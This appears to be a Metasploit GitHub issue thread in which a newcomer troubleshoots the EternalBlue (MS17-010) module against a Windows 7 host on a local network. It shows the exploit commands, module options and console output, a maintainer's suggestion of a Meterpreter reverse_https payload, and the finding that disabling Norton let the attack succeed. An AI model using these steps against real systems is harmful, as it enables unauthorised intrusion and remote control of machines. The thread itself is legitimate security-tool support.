ms17_010_eternalblue - Unable to continue with improper OS Arch / RubySMB Error

[genaray]

Im pretty new to metasploit, so i will try to explain my problem as well as i can.

1. Download Metasploit Framework ( latest ) for windows
2. Install and open console
3. Use module windows/smb/ms17_010_eternalblue

First i set the target to 0, im running Win7 Professional on my machine it is x64 based. Right after that i set the rhost to the certain ipv4.

When i hit exploit/run this shows up :

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set target 0
target => 0
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.0.176
RHOST => 192.168.0.176
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.0.12:4444
[*] 192.168.0.176:445 - Connecting to target for exploitation.
[+] 192.168.0.176:445 - Connection established for exploitation.
[+] 192.168.0.176:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.176:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.0.176:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.0.176:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.0.176:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[!] 192.168.0.176:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 192.168.0.176:445 - Disable VerifyArch option to proceed manually...
[-] 192.168.0.176:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.`

When i disbale VerifyArch it skips this part and i get this error Message :

RubySMB : ERROR : Communication Error : An error occured reading from the socket

Im totally stuck and have no idea why it wont work... A bit help would be great !

[busterb]

I don't see you setting a payload here. Can you try:

set payload windows/x64/meterpreter/reverse_https or similar?

[wvu]

I would like to add better printing around VerifyArch, since it doesn't use print_core_buffer. Hopefully this will track down the issue better when it comes up yet again.

@genaray: What you're seeing usually means the target's arch is wrong, but I suspect it's correct and "failing closed" on exploitation for some reason.

[genaray]

So i solved it ... norton blocked every attack... once i disabled it, it went like a charm ! Thanks for your help :grinning:

[troyam]

it, it went like a charm ! Thanks for your help 😀

Can you explain more? Thanks